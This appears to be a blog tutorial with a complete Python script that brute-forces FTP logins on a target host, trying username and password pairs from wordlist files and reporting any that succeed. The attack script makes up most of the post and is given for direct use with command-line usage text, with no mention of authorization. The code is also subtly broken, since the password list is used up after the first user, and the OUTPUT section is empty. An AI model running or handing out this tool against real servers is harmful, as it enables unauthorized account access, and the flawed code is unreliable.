The article will guide you on how to bruteforce FTP using ftplib library in python. I have already posted an article on how to check for anonymous FTP script. FTP is File transfer protocol which is used to upload/download files from server to client. It works on Port 21. FTPLIB provides many features to python to connect and handle FTP connections.
Explanation:
The code is pretty forward. We will import the ftplib library and sys to use arguments
def logfile(target,users,passw): This function works for the user and password files. It opens them and passes them to the function bruteftp.
def bruteftp(target,users,passw): This function takes the input sent by the logfile() function and remove the carriage return and newline from the user and password which came directly from the file using *.strip(‘\r’).strip(‘\n’). Once removed, it passes the new stripped user and password to the ftp.login() to check if they are correct.
CODE:
#!/usr/bin/python3
import ftplib
import sys
def logfile(target,users,passw):
try:
ufile=open(users,'r')
pfile=open(passw,'r')
for user in ufile.readlines():
for password in pfile.readlines():
bruteftp(target,user,password)
except Exception as e:
print(e)
def bruteftp(target,users,passw):
try:
ftp=ftplib.FTP(target)
user=users.strip('\r').strip('\n')
password=passw.strip('\r').strip('\n')
print('Trying with: '+user+" "+password)
ftp.login(user,password)
ftp.quit()
print('Login succeeded with: '+user+" "+password)
return(user,passw)
except Exception as e:
print("Incorrect credentials.")
return(None,None)
if len(sys.argv) !=4:
print("Not enough arguments:\n"+\
'Usage: ftpc.py target userfile passfile')
else:
host=sys.argv[1]
users=sys.argv[2]
passw=sys.argv[3]
logfile(host,users,passw)
OUTPUT:
